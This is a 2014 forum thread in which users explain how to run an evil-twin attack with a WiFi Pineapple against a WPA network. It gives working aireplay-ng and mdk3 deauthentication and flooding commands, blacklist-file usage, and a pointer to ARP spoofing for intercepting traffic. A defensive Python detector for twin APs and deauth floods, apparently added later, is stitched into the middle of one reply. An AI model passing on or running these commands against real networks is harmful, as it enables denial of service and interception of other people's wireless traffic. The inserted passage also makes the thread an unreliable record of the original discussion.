pabo2uk Posted April 30, 2014

Now I'm a bit more comfortable with the Pineapple, I thought I'd explore more creative ways of spoofing APs and devices. I'm not quite sure what kind of attack this is called (I think an evil twin attack; I may be mistaken) but have followed some advice on how to pull off this particular attack. The bottom line is I cannot get it to work and would like some guidance please. Essentially I'm trying to spoof a WPA protected AP and get one of its clients connecting to my MKV rather than the AP it thinks it's connected to. So this is what I have done...

PART 1
1. Log into the Pineapple and change the SSID of the AP to the target AP, in this case Epsilon2; also set the passkey of Epsilon2, which I already know!

PART 2
1. SSH into the Pineapple
2. airmon-ng start wlan1
3. airodump-ng -c 11 --bssid <00:11:22:33:44:55> wlan1 - LET THIS RUN AND WAIT FOR ANY DEVICE TO CONNECT
4. Once a device has connected I will note the device's MAC address
5. aireplay-ng -0 5 -a <00:11:22:33:44:55> -c <55:44:33:22:11:00> wlan1 - LET THIS RUN
6. I can see that the ACKs are being sent on both the AP and client

But it just doesn't work. What am I doing wrong? Do I have to set the channel on the interface for this to work, maybe? Thanks guys
3xNiks Posted April 30, 2014 (edited)

I think you need the monitor interface you have enabled with airmon-ng (normally mon0). Try running aireplay-ng and airodump-ng on the monitor interface.

Edited April 30, 2014 by 3xNiks
Xcellerator Posted April 30, 2014

As far as I am aware, this is incredibly difficult, if not impossible, to do. If the ESSID and MAC of the Pineapple match those of the AP (including the encryption, of course), then the two access points will both "compete" for the AP and will result in the client not connecting at all. It's a security feature of WPA and WEP that isn't in open networks, which is why Karma only works with open APs. If you know the password, just connect to it in client mode and use arpspoof to route all the other client connections through you.
pabo2uk (Author) Posted April 30, 2014

Thanks for the response. I can probably get my next question answered by looking on YouTube, but I'm gonna ask anyway... I have come across ARP spoofing before and have ATTEMPTED to play with it using Kali Linux... How would I go about using the commands while SSH'd into the Pineapple? In fact, what are the commands? Are there any good ARP spoofing tutorials? Thanks
NullNull Posted April 30, 2014 (edited)

> As far as I am aware, this is incredibly difficult if not impossible to do.

Maybe you are mistaking it with something else.

Step 1
Configure your AP to have exactly the same SSID, ENCRYPTION and PASSKEY as the root AP BUT a different channel. The channel of your AP should be at least 3 channels away from the root AP (e.g. if the root AP channel is 11, yours should be 7 at most; I would have set it to 1).

Step 2
To deauth clients from the root AP you will need a second wireless card (e.g. wlan1) and use aireplay-ng or mdk3 deauth mode. I suggest mdk3. If you do not run any deauth attack, use the same channel as the root AP. In this case new clients will connect to the AP with better/stronger signal quality/strength and the already connected clients will stay connected to the root AP.

Run this to install mdk3:
opkg update
opkg install mdk3

and this to see the mdk3 options:
mdk3 --fullhelp

To run the deauth attack with mdk3 run:
ifconfig wlan1 down
airmon-ng start wlan1
echo {root_ap_bssid} > black.list
mdk3 {monitor_int} d -c {root_ap_channel} -b black.list
(replace {root_ap_bssid}, {monitor_int} and {root_ap_channel})

If you still want to use aireplay-ng and deauth every client from the root AP run:
ifconfig wlan1 down
iwconfig wlan1 channel {root_ap_channel}
airmon-ng start wlan1
aireplay-ng -0 100 -a {root_ap_bssid} {monitor_int}
(replace {root_ap_channel}, {root_ap_bssid} and {monitor_int})

Else, if you want to deauth only one client run:
ifconfig wlan1 down
iwconfig wlan1 channel {root_ap_channel}
airmon-ng start wlan1
aireplay-ng -0 100 -a {root_ap_bssid} -c {client_bssid} {monitor_int}
(replace {root_ap_channel}, {root_ap_bssid}, {client_bssid} and {monitor_int})

Edited April 30, 2014 by KiatoGS
Xcellerator Posted May 1, 2014

Hmm, looks fairly similar to what I've tried in the past. Do you not encounter any clients just dropping off completely? Perhaps I didn't test it thoroughly enough; I apologise if it can indeed be done!
pabo2uk (Author) Posted May 1, 2014

Thanks for the very informative response. I shall definitely give this a bash and let you know the results. Quick question: please can you explain the difference between mdk3 and aireplay? All I know is that they are deauth tools... Thanks
TYTechnolust Posted May 1, 2014 (edited)

MDK floods packets to the AP in order to reboot the AP. Aireplay-ng removes clients through de-auth.

Edited May 1, 2014 by TYTechnolust
pabo2uk (Author) Posted May 1, 2014

What do you mean by add clients? Does it just overload it with fake clients, causing the AP to crash? Also, when you say crash, is that just crashing the WiFi part of the router?! By the sound of things (I'm guessing) mdk3 is a better choice? Sorry for all the annoying questions, I'm just interested in how it all works... Thanks
TYTechnolust Posted May 1, 2014

Client traffic actually (packets), to force a denial of service/reboot. MDK3 vs Aireplay-ng... some routers are more immune to one over the other.
pabo2uk (Author) Posted May 1, 2014

Ahh, I see, so while the router is rebooting the Pineapple is quite happily taking on its clients! Clever. Thanks for that, Technolust...
pabo2uk (Author) Posted May 1, 2014

Thanks for all the support guys... Just one last question... PROMISE :) Earlier in this thread KiatoGS kindly put down some mdk3 commands; can you just explain what the commands are doing?
echo {root_ap_bssid} > black.list
mdk3 {monitor_int} d -c {root_ap_channel} -b black.list
Thanks
TYTechnolust Posted May 1, 2014

echo {root_ap_bssid} > black.list = create a file called black.list with the AP BSSID
mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on the AP channel (-c 6) with the blacklist file you created above (-b)
NullNull Posted May 1, 2014 (edited)

> Thanks for all the support guys... Just one last question... PROMISE :) Earlier in this thread KiatoGS kindly put down some mdk3 commands; can you just explain what the commands are doing?
> echo {root_ap_bssid} > black.list
> mdk3 {monitor_int} d -c {root_ap_channel} -b black.list
> Thanks

> echo {root_ap_bssid} > black.list = create a file called black.list with the AP BSSID
> mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on the AP channel (-c 6) with the blacklist file you created above (-b)

TYTechnolust, this is correct! I just want to add some details... In the black.list you can add as many APs as you like. The format of the file should be this:

root@kiatogs:~# cat black.list
CC:1A:FA:9F:3D:14
C1:F4:56:7A:23:35
38:22:FF:A2:65:F1
root@kiatogs:~#

If the APs you want to deauth (whose BSSIDs are in the black.list) are on different channels you can use:
mdk3 mon0 d -c 1,6,11,13 -b black.list

This command will use interface mon0 and mdk3 will search for the BSSIDs that are in the black.list on channels 1, 6, 11 and 13. If the -c parameter is not declared, mdk3 will hop across all channels to find those BSSIDs. You can find out more by typing:
mdk3 --fullhelp
or:
man mdk3

Edited May 1, 2014 by KiatoGS
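From the defender's side, both techniques discussed in this thread, a twin AP beaconing the same SSID from a different BSSID and channel (NullNull's Step 1) and a deauthentication burst from aireplay-ng -0 100 or mdk3 d (Step 2), leave a clear footprint in a monitor-mode capture. The following detector is an added example, not code from this thread or from the Pineapple project; the frame records, the inventory of authorised BSSIDs, and the window and threshold values are constructed assumptions to be tuned per site.

```python
from collections import defaultdict

# Constructed sample capture: (timestamp_s, frame_type, bssid, ssid, channel).
# ssid/channel are only meaningful for beacons; deauth records carry None.
SAMPLE_FRAMES = [
    (0.0, "beacon", "00:11:22:33:44:55", "Epsilon2", 11),
    (0.1, "beacon", "00:11:22:33:44:55", "Epsilon2", 11),
    (0.2, "beacon", "AA:BB:CC:DD:EE:FF", "Epsilon2", 1),   # same SSID, other BSSID/channel
] + [(0.3 + i * 0.01, "deauth", "00:11:22:33:44:55", None, None) for i in range(40)]

# Assumed inventory of legitimate APs: SSID -> set of authorised BSSIDs.
KNOWN_APS = {"Epsilon2": {"00:11:22:33:44:55"}}

def find_evil_twins(frames, known_aps):
    """Return sorted (ssid, bssid, channel) for beacons that advertise a known
    SSID from a BSSID that is not in the inventory."""
    seen = set()
    for _, ftype, bssid, ssid, chan in frames:
        if ftype == "beacon" and ssid in known_aps and bssid not in known_aps[ssid]:
            seen.add((ssid, bssid, chan))
    return sorted(seen)

def find_deauth_floods(frames, window_s=1.0, threshold=20):
    """Return {bssid: peak deauth frames in any sliding window of window_s
    seconds}, keeping only BSSIDs whose peak exceeds threshold. A healthy AP
    sends a handful of deauths; aireplay-ng -0 100 or mdk3 d sends bursts."""
    times = defaultdict(list)
    for ts, ftype, bssid, _, _ in frames:
        if ftype == "deauth":
            times[bssid].append(ts)
    floods = {}
    for bssid, ts_list in times.items():
        ts_list.sort()
        start = peak = 0
        for end, ts in enumerate(ts_list):
            while ts - ts_list[start] > window_s:   # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            floods[bssid] = peak
    return floods

if __name__ == "__main__":
    print("possible evil twins:", find_evil_twins(SAMPLE_FRAMES, KNOWN_APS))
    print("deauth floods:", find_deauth_floods(SAMPLE_FRAMES))
```

A real deployment would feed the same tuples from a pcap or a wireless IDS export instead of the constructed list, and alert on either finding.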
pabo2uk (Author) Posted May 1, 2014

Thanks everyone for your input. It is greatly appreciated.